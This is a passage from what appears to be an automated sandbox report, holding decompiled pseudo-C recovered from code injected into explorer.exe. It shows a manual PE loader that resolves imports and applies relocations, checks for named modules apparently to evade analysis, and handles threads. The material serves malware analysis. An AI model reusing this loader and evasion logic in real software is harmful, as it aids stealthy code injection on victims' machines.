        								__eflags = _t145;
        								_a4 =  *_t272;
        								_t108 = _t272 + 0x6c; // 0xa1ec8b55
        								_t234 =  *_t108;
        								_v8 = _t234;
        							}
        						}
        						_t255 = _a4;
        						_t220 =  *((intOrPtr*)(_a4 + 4));
        						__eflags = _t145 - _t220;
        						_t221 =  <=  ? _t145 : _t220;
        						_t146 = _t221;
        						_a4 = _t221;
        						_t222 = _a8;
        						__eflags = _t146;
        						if(_t146 != 0) {
        							_t114 = _t272 + 0x38; // 0xf47d8bff
        							E000D4C30(_t255,  *_t114 + _v8, _t146);
        							_t273 = _t273 + 0xc;
        							_t117 = _t272 + 0x6c;
        							 *_t117 =  *(_t272 + 0x6c) + _a4;
        							__eflags =  *_t117;
        							_t119 = _t272 + 0x6c; // 0xa1ec8b55
        							_t234 =  *_t119;
        						}
        						__eflags =  *(_t272 + 0x16c0) - _t234;
        						if( *(_t272 + 0x16c0) < _t234) {
        							 *(_t272 + 0x16c0) = _t234;
        						}
        						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
        						_t123 = _t272 + 0xc; // 0x452bf84d
        						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
        						__eflags = _t257 - 0xffff;
        						_t258 =  >  ? 0xffff : _t257;
        						_t124 = _t272 + 0x2c; // 0x8df075ff
        						_t151 =  *_t124;
        						_t125 = _t272 + 0x5c; // 0x84e85000
        						_t235 = _t234 -  *_t125;
        						__eflags = _t258 - _t151;
        						_t152 =  <=  ? _t258 : _t151;
        						__eflags = _t235 - ( <=  ? _t258 : _t151);
        						if(_t235 >= ( <=  ? _t258 : _t151)) {
        							L49:
        							__eflags = _t235 - _t258;
        							_t154 =  >  ? _t258 : _t235;
        							_a4 =  >  ? _t258 : _t235;
        							__eflags = _t222 - 4;
        							if(_t222 != 4) {
        								L53:
        								_t269 = 0;
        								__eflags = 0;
        							} else {
        								_t161 =  *_t272;
        								__eflags =  *(_t161 + 4);
        								_t154 = _a4;
        								if( *(_t161 + 4) != 0) {
        									goto L53;
        								} else {
        									__eflags = _t154 - _t235;
        									if(_t154 != _t235) {
        										goto L53;
        									} else {
        										_t269 = _t222 - 3;
        									}
        								}
        							}
        							_t131 = _t272 + 0x38; // 0xf47d8bff
        							_t132 = _t272 + 0x5c; // 0x84e85000
        							E000D5D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
        							_t134 = _t272 + 0x5c;
        							 *_t134 =  *(_t272 + 0x5c) + _a4;
        							__eflags =  *_t134;
        							E000D4AF0( *_t134,  *_t272);
        						} else {
        							__eflags = _t235;
        							if(_t235 != 0) {
        								L46:
        								__eflags = _t222;
        								if(_t222 != 0) {
        									_t162 =  *_t272;
        									__eflags =  *(_t162 + 4);
        									if( *(_t162 + 4) == 0) {
        										__eflags = _t235 - _t258;
        										if(_t235 <= _t258) {
        											goto L49;
        										}
        									}
        								}
        							} else {
        								__eflags = _t222 - 4;
        								if(_t222 == 4) {
        									goto L46;
        								}
        							}
        						}
        						asm("sbb edi, edi");
        						_t271 =  ~_t269 & 0x00000002;
        						__eflags = _t271;
        						return _t271;
        					} else {
        						__eflags = _t218 - 4;
        						if(_t218 == 4) {
        							goto L34;
        						} else {
        							_t173 =  *_t272;
        							__eflags =  *(_t173 + 4);
        							if( *(_t173 + 4) != 0) {
        								goto L34;
        							} else {
        								_t88 = _t272 + 0x5c; // 0x84e85000
        								__eflags = _t254 -  *_t88;
        								if(_t254 !=  *_t88) {
        									goto L34;
        								} else {
        									return 1;
        								}
        							}
        						}
        					}
        				} else {
        					return 3;
        				}
        			}

        APIs
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: memcpy
        • String ID:
        • API String ID: 3510742995-0
        • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction ID: ada663c656bf4378222564d16f1058757340d539b71a268776186381d56c4217
        • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction Fuzzy Hash: B4D11375600B009FCB64CF6DD8D496ABBE1FF98304B24892EE88AC7705D771E9448B65
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 70%
        			E000C4D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
        				char _v516;
        				char _v556;
        				char _v564;
        				char _v568;
        				char _v572;
        				char _v576;
        				intOrPtr _v580;
        				char _v588;
        				signed int _v596;
        				intOrPtr _v602;
        				intOrPtr _v604;
        				char _v608;
        				CHAR* _v612;
        				CHAR* _v616;
        				signed int _v620;
        				signed int _v624;
        				signed int _v628;
        				signed int _v632;
        				char _v636;
        				intOrPtr _t119;
        				signed int _t122;
        				CHAR* _t124;
        				intOrPtr _t125;
        				CHAR* _t127;
        				WCHAR* _t130;
        				intOrPtr _t133;
        				intOrPtr _t137;
        				WCHAR* _t138;
        				intOrPtr _t142;
        				WCHAR* _t143;
        				CHAR* _t144;
        				intOrPtr _t145;
        				intOrPtr _t150;
        				intOrPtr _t153;
        				WCHAR* _t154;
        				signed int _t159;
        				WCHAR* _t160;
        				intOrPtr _t163;
        				intOrPtr _t165;
        				intOrPtr _t166;
        				intOrPtr _t170;
        				signed int _t173;
        				signed int _t178;
        				intOrPtr _t182;
        				WCHAR* _t184;
        				char _t186;
        				WCHAR* _t188;
        				intOrPtr _t200;
        				intOrPtr _t211;
        				signed int _t215;
        				char _t220;
        				WCHAR* _t231;
        				intOrPtr _t235;
        				intOrPtr _t238;
        				intOrPtr _t239;
        				intOrPtr _t246;
        				signed int _t248;
        				WCHAR* _t249;
        				CHAR* _t250;
        				intOrPtr _t262;
        				void* _t271;
        				intOrPtr _t272;
        				signed int _t277;
        				void* _t278;
        				intOrPtr _t280;
        				signed int _t282;
        				void* _t298;
        				void* _t299;
        				intOrPtr _t305;
        				CHAR* _t326;
        				void* _t328;
        				WCHAR* _t329;
        				intOrPtr _t331;
        				WCHAR* _t333;
        				signed int _t335;
        				intOrPtr* _t337;
        				void* _t338;
        				void* _t339;
        				void* _t353;
        
        				_t353 = __fp0;
        				_t337 = (_t335 & 0xfffffff8) - 0x26c;
        				_t119 =  *0xde688; // 0xf0000
        				_v620 = _v620 & 0x00000000;
        				_t328 = __ecx;
        				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
        					L7:
        					_t14 = E000CB7A8(0xdb9c8,  &_v516) + 1; // 0x1
        					E000CA86D( &_v556, _t14, _t351);
        					_t298 = 0x64;
        					_t122 = E000CA471( &_v556, _t298);
        					 *0xde748 = _t122;
        					if(_t122 != 0) {
        						_push(0x4e5);
        						_t299 = 0x10;
        						 *0xde680 = E000CE1BC(0xdb9cc, _t299);
        						 *_t337 = 0x610;
        						_t124 = E000C95E1(0xdb9cc);
        						_push(0);
        						_push(_t124);
        						_v612 = _t124;
        						_t125 =  *0xde688; // 0xf0000
        						_t127 = E000C92E5(_t125 + 0x228);
        						_t338 = _t337 + 0xc;
        						_v616 = _t127;
        						E000C85D5( &_v612);
        						_t130 = E000CB269(_t127);
        						_t246 = 3;
        						__eflags = _t130;
        						if(_t130 != 0) {
        							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
        							 *_t328 = _t246;
        						}
        						E000C861A( &_v616, 0xfffffffe);
        						_t133 =  *0xde688; // 0xf0000
        						_t22 = _t133 + 0x114; // 0xf0114
        						E000C4A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
        						_t262 =  *0xde688; // 0xf0000
        						_t339 = _t338 + 0x14;
        						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
        						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
        							L17:
        							asm("stosd");
        							asm("stosd");
        							asm("stosd");
        							asm("stosd");
        							asm("stosd");
        							_v572 = _t328;
        							_v576 =  *((intOrPtr*)(_t262 + 0x214));
        							_t137 =  *0xde680; // 0x0
        							_t138 =  *(_t137 + 8);
        							__eflags = _t138;
        							if(_t138 != 0) {
        								 *_t138(0, 0, 1,  &_v568,  &_v564);
        							}
        							_v620 = _v620 & 0x00000000;
        							E000CE2C6(_t353,  &_v576);
        							_pop(_t262);
        							_t142 =  *0xde6b4; // 0x280fa98
        							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
        							__eflags = _t143;
        							if(_t143 == 0) {
        								E000CE2C6(_t353,  &_v588);
        								_t235 =  *0xde6b4; // 0x280fa98
        								_pop(_t262);
        								 *((intOrPtr*)(_t235 + 0xc))(_v632);
        							}
        							__eflags =  *0xde73c;
        							if( *0xde73c <= 0) {
        								goto L36;
        							} else {
        								_t165 =  *0xde680; // 0x0
        								__eflags =  *(_t165 + 8);
        								if( *(_t165 + 8) != 0) {
        									_t231 =  *(_t165 + 0xc);
        									__eflags = _t231;
        									if(_t231 != 0) {
        										 *_t231(_v580);
        									}
        								}
        								_t166 =  *0xde688; // 0xf0000
        								_t262 =  *((intOrPtr*)(_t166 + 0x214));
        								__eflags = _t262 - _t246;
        								if(_t262 == _t246) {
        									goto L36;
        								} else {
        									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
        									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
        										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
        										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
        											E000C49A5();
        											asm("stosd");
        											asm("stosd");
        											asm("stosd");
        											asm("stosd");
        											_t170 =  *0xde684; // 0x280f8f0
        											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
        											_t262 = _v602;
        											_t248 = 0x3c;
        											_t173 = _t262 + 0x00000002 & 0x0000ffff;
        											_v596 = _t173;
        											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
        											_t178 = _t262 + 0x0000000e & 0x0000ffff;
        											_v624 = _t178;
        											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
        											_t182 =  *0xde688; // 0xf0000
        											_t184 = E000CFC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
        											_t339 = _t339 + 0xc;
        											__eflags = _t184;
        											if(_t184 >= 0) {
        												_t333 = E000C8604(0x1000);
        												_v616 = _t333;
        												_pop(_t262);
        												__eflags = _t333;
        												if(_t333 != 0) {
        													_t186 = E000C109A(_t262, 0x148);
        													_t305 =  *0xde688; // 0xf0000
        													_v636 = _t186;
        													_push(_t305 + 0x648);
        													_push(0xa);
        													_push(7);
        													_t271 = 2;
        													E000C902D(_t271,  &_v572);
        													_t272 =  *0xde688; // 0xf0000
        													_t188 = E000C60DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
        													_t339 = _t339 + 0x18;
        													_v632 = _t188;
        													__eflags = _t188;
        													if(_t188 != 0) {
        														_push(_v624 % _t248 & 0x0000ffff);
        														_push(_v628 & 0x0000ffff);
        														_push(_v596 % _t248 & 0x0000ffff);
        														_push(_v620 & 0x0000ffff);
        														_push(_v632);
        														_push( &_v572);
        														_t200 =  *0xde688; // 0xf0000
        														__eflags = _t200 + 0x1020;
        														E000C9640(_t333, 0x1000, _v636, _t200 + 0x1020);
        														E000C85D5( &_v636);
        														E000CA911(_t333, 0, 0xbb8, 1);
        														E000C861A( &_v632, 0xfffffffe);
        														_t339 = _t339 + 0x44;
        													}
        													E000C861A( &_v616, 0xfffffffe);
        													_pop(_t262);
        												}
        											}
        										}
        										goto L36;
        									}
        									__eflags = _t262 - 2;
        									if(_t262 != 2) {
        										goto L36;
        									}
        									E000C49A5();
        									asm("stosd");
        									asm("stosd");
        									asm("stosd");
        									asm("stosd");
        									_t211 =  *0xde684; // 0x280f8f0
        									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
        									_t215 = _v602 + 0x00000002 & 0x0000ffff;
        									_v628 = _t215;
        									_t277 = 0x3c;
        									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
        									_t249 = E000C8604(0x1000);
        									_v624 = _t249;
        									_pop(_t278);
        									__eflags = _t249;
        									if(_t249 != 0) {
        										_t220 = E000C95E1(_t278, 0x32d);
        										_t280 =  *0xde688; // 0xf0000
        										_push(_t280 + 0x228);
        										_t282 = 0x3c;
        										_v636 = _t220;
        										_push(_v628 % _t282 & 0x0000ffff);
        										E000C9640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
        										E000C85D5( &_v636);
        										E000CA911(_t249, 0, 0xbb8, 1);
        										E000C861A( &_v624, 0xfffffffe);
        									}
        									goto L41;
        								}
        							}
        						} else {
        							_t238 =  *((intOrPtr*)(_t262 + 0x214));
        							__eflags = _t238 - _t246;
        							if(_t238 == _t246) {
        								goto L17;
        							}
        							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
        							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
        								L36:
        								_t144 = E000C95E1(_t262, 0x610);
        								_push(0);
        								_push(_t144);
        								_v616 = _t144;
        								_t145 =  *0xde688; // 0xf0000
        								_t329 = E000C92E5(_t145 + 0x228);
        								_v612 = _t329;
        								__eflags = _t329;
        								if(_t329 != 0) {
        									_t160 = E000CB269(_t329);
        									__eflags = _t160;
        									if(_t160 != 0) {
        										_t163 =  *0xde684; // 0x280f8f0
        										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
        									}
        									E000C861A( &_v612, 0xfffffffe);
        								}
        								E000C85D5( &_v616);
        								_t150 =  *0xde688; // 0xf0000
        								lstrcpynW(_t150 + 0x438,  *0xde740, 0x105);
        								_t153 =  *0xde688; // 0xf0000
        								_t154 = _t153 + 0x228;
        								__eflags = _t154;
        								lstrcpynW(_t154,  *0xde738, 0x105);
        								_t331 =  *0xde688; // 0xf0000
        								_t117 = _t331 + 0x228; // 0xf0228
        								 *((intOrPtr*)(_t331 + 0x434)) = E000C8FBE(_t117, __eflags);
        								E000C861A(0xde740, 0xfffffffe);
        								E000C861A(0xde738, 0xfffffffe);
        								L41:
        								_t159 = 0;
        								__eflags = 0;
        								L42:
        								return _t159;
        							}
        							__eflags = _t238 - 2;
        							if(_t238 != 2) {
        								goto L36;
        							}
        							goto L17;
        						}
        					}
        					L8:
        					_t159 = _t122 | 0xffffffff;
        					goto L42;
        				}
        				_t250 = E000C95C7(0x6e2);
        				_v616 = _t250;
        				_t326 = E000C95C7(0x9f5);
        				_v612 = _t326;
        				if(_t250 != 0 && _t326 != 0) {
        					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
        						_v620 = 1;
        					}
        					E000C85C2( &_v616);
        					_t122 = E000C85C2( &_v612);
        					_t351 = _v620;
        					if(_v620 != 0) {
        						goto L8;
        					}
        				}
        			}

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 000C4DC0
        • GetModuleHandleA.KERNEL32(00000000), ref: 000C4DC7
        • lstrcpynW.KERNEL32(000EFBC8,00000105), ref: 000C526F
        • lstrcpynW.KERNEL32(000EFDD8,00000105), ref: 000C5283
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: HandleModulelstrcpyn
        • String ID:
        • API String ID: 3430401031-0
        • Opcode ID: b890a824844bce4d007567c7962961c6db42f7b36bf12e68b608a8b645727ba8
        • Instruction ID: c173cb8aab5dce0c54eecf333e52df57e25390bf92b520147ff03b0ab50bf869
        • Opcode Fuzzy Hash: b890a824844bce4d007567c7962961c6db42f7b36bf12e68b608a8b645727ba8
        • Instruction Fuzzy Hash: 36E1CF71604341AFE750EF64CC86FAE73E9AB98314F040A2EF944DB2D2DB74D9448B62
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 52%
        			E000D2AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
        				signed int _v5;
        				signed short _v12;
        				intOrPtr* _v16;
        				signed int* _v20;
        				intOrPtr _v24;
        				unsigned int _v28;
        				signed short* _v32;
        				struct HINSTANCE__* _v36;
        				intOrPtr* _v40;
        				signed short* _v44;
        				intOrPtr _v48;
        				unsigned int _v52;
        				intOrPtr _v56;
        				_Unknown_base(*)()* _v60;
        				signed int _v64;
        				intOrPtr _v68;
        				intOrPtr _v72;
        				unsigned int _v76;
        				intOrPtr _v80;
        				signed int _v84;
        				intOrPtr _v88;
        				signed int _t149;
        				void* _t189;
        				signed int _t194;
        				signed int _t196;
        				intOrPtr _t236;
        
        				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
        				_v24 = _v72;
        				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
        				_v56 = _t236;
        				if(_t236 == 0) {
        					L13:
        					while(0 != 0) {
        					}
        					_push(8);
        					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
        						L35:
        						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
        						while(0 != 0) {
        						}
        						if(_a12 != 0) {
        							 *_a12 = _v68;
        						}
        						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
        						return _v68(_a4, 1, _a8);
        					}
        					_v84 = 0x80000000;
        					_t149 = 8;
        					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
        					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
        						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
        						if(_v36 == 0) {
        							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
        						}
        						if(_v36 != 0) {
        							if( *_v16 == 0) {
        								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
        							} else {
        								_v20 =  *_v16 + _a4;
        							}
        							_v64 = _v64 & 0x00000000;
        							while( *_v20 != 0) {
        								if(( *_v20 & _v84) == 0) {
        									_v88 =  *_v20 + _a4;
        									_v60 = GetProcAddress(_v36, _v88 + 2);
        								} else {
        									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
        								}
        								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
        									 *_v20 = _v60;
        								} else {
        									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
        								}
        								_v20 =  &(_v20[1]);
        								_v64 = _v64 + 4;
        							}
        							_v16 = _v16 + 0x14;
        							continue;
        						} else {
        							_t189 = 0xfffffffd;
        							return _t189;
        						}
        					}
        					goto L35;
        				}
        				_t194 = 8;
        				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
        				_t196 = 8;
        				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
        				while(0 != 0) {
        				}
        				while(_v48 > 0) {
        					_v28 = _v44[2];
        					_v48 = _v48 - _v28;
        					_v28 = _v28 - 8;
        					_v28 = _v28 >> 1;
        					_v32 =  &(_v44[4]);
        					_v80 = _a4 +  *_v44;
        					_v52 = _v28;
        					while(1) {
        						_v76 = _v52;
        						_v52 = _v52 - 1;
        						if(_v76 == 0) {
        							break;
        						}
        						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
        						_v12 =  *_v32 & 0xfff;
        						_v40 = (_v12 & 0x0000ffff) + _v80;
        						if((_v5 & 0x000000ff) != 3) {
        							if((_v5 & 0x000000ff) == 0xa) {
        								 *_v40 =  *_v40 + _v56;
        							}
        						} else {
        							 *_v40 =  *_v40 + _v56;
        						}
        						_v32 =  &(_v32[1]);
        					}
        					_v44 = _v32;
        				}
        				goto L13;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(?), ref: 000D2C4C
        • LoadLibraryA.KERNEL32(?), ref: 000D2C65
        • GetProcAddress.KERNEL32(00000000,890CC483), ref: 000D2CC1
        • GetProcAddress.KERNEL32(00000000,?), ref: 000D2CE0
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: AddressProc$HandleLibraryLoadModule
        • String ID:
        • API String ID: 384173800-0
        • Opcode ID: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
        • Instruction ID: 5402422793a648d839d8c1373124b4a30482a42bb4b40aad00deaa3b82b4c0c1
        • Opcode Fuzzy Hash: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
        • Instruction Fuzzy Hash: 92A18A75A10209EFCB54CFA8C985AADBBF1FF08314F14845AE815EB361D774AA81CF64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 75%
        			E000C1C68(signed int __ecx, void* __eflags, void* __fp0) {
        				char _v16;
        				intOrPtr _v20;
        				char _v24;
        				char _v28;
        				void* _t13;
        				intOrPtr _t15;
        				signed int _t16;
        				intOrPtr _t17;
        				signed int _t18;
        				char _t20;
        				intOrPtr _t22;
        				void* _t23;
        				void* _t24;
        				intOrPtr _t29;
        				intOrPtr _t35;
        				intOrPtr _t41;
        				intOrPtr _t43;
        				intOrPtr _t48;
        				void* _t51;
        				signed int _t61;
        				signed int _t64;
        				void* _t71;
        
        				_t71 = __fp0;
        				_t61 = __ecx;
        				_t41 =  *0xde6dc; // 0x0
        				_t13 = E000CA4BF(_t41, 0);
        				while(_t13 < 0) {
        					E000C980C( &_v28);
        					_t43 =  *0xde6e0; // 0x0
        					_t15 =  *0xde6e4; // 0x0
        					_t41 = _t43 + 0xe10;
        					asm("adc eax, ebx");
        					__eflags = _t15 - _v24;
        					if(__eflags > 0) {
        						L9:
        						_t16 = 0xfffffffe;
        						L13:
        						return _t16;
        					}
        					if(__eflags < 0) {
        						L4:
        						_t17 =  *0xde684; // 0x280f8f0
        						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xde6d0, 0);
        						__eflags = _t18;
        						if(_t18 == 0) {
        							break;
        						}
        						_t35 =  *0xde684; // 0x280f8f0
        						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
        						_t41 =  *0xde6dc; // 0x0
        						__eflags = 0;
        						_t13 = E000CA4BF(_t41, 0);
        						continue;
        					}
        					__eflags = _t41 - _v28;
        					if(_t41 >= _v28) {
        						goto L9;
        					}
        					goto L4;
        				}
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				_t20 =  *0xde6e8; // 0x0
        				_v28 = _t20;
        				_t22 = E000CA6A9(_t41, _t61,  &_v16);
        				_v20 = _t22;
        				if(_t22 != 0) {
        					_t23 = GetCurrentProcess();
        					_t24 = GetCurrentThread();
        					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xde6d0, 0, 0, 2);
        					E000C980C(0xde6e0);
        					_t64 = E000C1A1B( &_v28, E000C1226, _t71);
        					__eflags = _t64;
        					if(_t64 >= 0) {
        						_push(0);
        						_push( *0xde760);
        						_t51 = 0x27;
        						E000C9F06(_t51);
        					}
        				} else {
        					_t64 = _t61 | 0xffffffff;
        				}
        				_t29 =  *0xde684; // 0x280f8f0
        				 *((intOrPtr*)(_t29 + 0x30))( *0xde6d0);
        				_t48 =  *0xde6dc; // 0x0
        				 *0xde6d0 = 0;
        				E000CA4DB(_t48);
        				E000C861A( &_v24, 0);
        				_t16 = _t64;
        				goto L13;
        			}

        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: acaa18c433e5a6e4a1d924e382e7253824042e8834f82c148592d1f25155a873
        • Instruction ID: f2db016a6e86ac95650e658f1212804d8919bf6c937486c21d9280327b646b79
        • Opcode Fuzzy Hash: acaa18c433e5a6e4a1d924e382e7253824042e8834f82c148592d1f25155a873
        • Instruction Fuzzy Hash: E731C732605244AFE354EF64EC85EAE77A9EB55390B10092FF901CB2E3DE38DC048766
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E000C1B2D(void* __eflags, void* __fp0) {
        				char _v24;
        				char _v28;
        				void* _t12;
        				intOrPtr _t14;
        				void* _t15;
        				intOrPtr _t16;
        				void* _t17;
        				void* _t19;
        				void* _t20;
        				char _t24;
        				intOrPtr _t26;
        				intOrPtr _t28;
        				intOrPtr _t33;
        				intOrPtr _t38;
        				intOrPtr _t40;
        				void* _t41;
        				intOrPtr _t46;
        				void* _t48;
        				intOrPtr _t51;
        				void* _t61;
        				void* _t71;
        
        				_t71 = __fp0;
        				_t38 =  *0xde6f4; // 0x0
        				_t12 = E000CA4BF(_t38, 0);
        				while(_t12 < 0) {
        					E000C980C( &_v28);
        					_t40 =  *0xde700; // 0x0
        					_t14 =  *0xde704; // 0x0
        					_t41 = _t40 + 0x3840;
        					asm("adc eax, ebx");
        					__eflags = _t14 - _v24;
        					if(__eflags > 0) {
        						L13:
        						_t15 = 0;
        					} else {
        						if(__eflags < 0) {
        							L4:
        							_t16 =  *0xde684; // 0x280f8f0
        							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xde6ec, 0);
        							__eflags = _t17;
        							if(_t17 == 0) {
        								break;
        							} else {
        								_t33 =  *0xde684; // 0x280f8f0
        								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
        								_t51 =  *0xde6f4; // 0x0
        								__eflags = 0;
        								_t12 = E000CA4BF(_t51, 0);
        								continue;
        							}
        						} else {
        							__eflags = _t41 - _v28;
        							if(_t41 >= _v28) {
        								goto L13;
        							} else {
        								goto L4;
        							}
        						}
        					}
        					L12:
        					return _t15;
        				}
        				E000C980C(0xde700);
        				_t19 = GetCurrentProcess();
        				_t20 = GetCurrentThread();
        				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xde6ec, 0, 0, 2);
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				_t24 =  *0xde6e8; // 0x0
        				_v28 = _t24;
        				_t61 = E000C1A1B( &_v28, E000C131E, _t71);
        				if(_t61 >= 0) {
        					_push(0);
        					_push( *0xde760);
        					_t48 = 0x27;
        					E000C9F06(_t48);
        				}
        				if(_v24 != 0) {
        					E000C6890( &_v24);
        				}
        				_t26 =  *0xde684; // 0x280f8f0
        				 *((intOrPtr*)(_t26 + 0x30))( *0xde6ec);
        				_t28 =  *0xde758; // 0x0
        				 *0xde6ec = 0;
        				_t29 =  !=  ? 1 : _t28;
        				_t46 =  *0xde6f4; // 0x0
        				 *0xde758 =  !=  ? 1 : _t28;
        				E000CA4DB(_t46);
        				_t15 = _t61;
        				goto L12;
        			}

        APIs
        • GetCurrentProcess.KERNEL32(000DE6EC,00000000,00000000,00000002), ref: 000C1BCC
        • GetCurrentThread.KERNEL32(00000000), ref: 000C1BCF
        • GetCurrentProcess.KERNEL32(00000000), ref: 000C1BD6
        • DuplicateHandle.KERNEL32 ref: 000C1BD9
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: Current$Process$DuplicateHandleThread
        • String ID:
        • API String ID: 3566409357-0
        • Opcode ID: 538cc19757898cffef8cf913ee8391aaf49bd930aa49bd22eda4a4af132a8de5
        • Instruction ID: 2b5b3560eca2b9c66e54fa8514e9480b8e1ea27dea2e81419eb01e222fcba38a
        • Opcode Fuzzy Hash: 538cc19757898cffef8cf913ee8391aaf49bd930aa49bd22eda4a4af132a8de5
        • Instruction Fuzzy Hash: C831A6716053419FE744FF64EC89EAE77A4EB55390B00456EF9018B2A3DA38DC04CB72
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 94%
        			E000CB7A8(WCHAR* __ecx, void* __edx) {
        				signed int _v8;
        				long _v12;
        				char _v16;
        				short _v528;
        				char _v1040;
        				char _v1552;
        				intOrPtr _t23;
        				char _t27;
        				intOrPtr _t28;
        				signed int _t29;
        				void* _t33;
        				long _t38;
        				WCHAR* _t43;
        				WCHAR* _t56;
        
        				_t44 = __ecx;
        				_v8 = _v8 & 0x00000000;
        				_t43 = __edx;
        				_t56 = __ecx;
        				memset(__edx, 0, 0x100);
        				_v12 = 0x100;
        				_t23 =  *0xde684; // 0x280f8f0
        				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
        				lstrcpynW(_t43,  &_v528, 0x100);
        				_t27 = E000C95E1(_t44, 0xa88);
        				_v16 = _t27;
        				_t28 =  *0xde684; // 0x280f8f0
        				_t29 =  *((intOrPtr*)(_t28 + 0x68))(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
        				asm("sbb eax, eax");
        				_v8 = _v8 &  ~_t29;
        				E000C85D5( &_v16);
        				_t33 = E000CC392(_t43);
        				E000C9640( &(_t43[E000CC392(_t43)]), 0x100 - _t33, L"%u", _v8);
        				lstrcatW(_t43, _t56);
        				_t38 = E000CC392(_t43);
        				_v12 = _t38;
        				CharUpperBuffW(_t43, _t38);
        				return E000CD400(_t43, E000CC392(_t43) + _t40, 0);
        			}

        APIs
        • memset.MSVCRT ref: 000CB7C5
        • lstrcpynW.KERNEL32(?,?,00000100), ref: 000CB7EF
          • Part of subcall function 000C9640: _vsnwprintf.MSVCRT ref: 000C965D
        • lstrcatW.KERNEL32 ref: 000CB85A
        • CharUpperBuffW.USER32(?,00000000), ref: 000CB86C
        Memory Dump Source
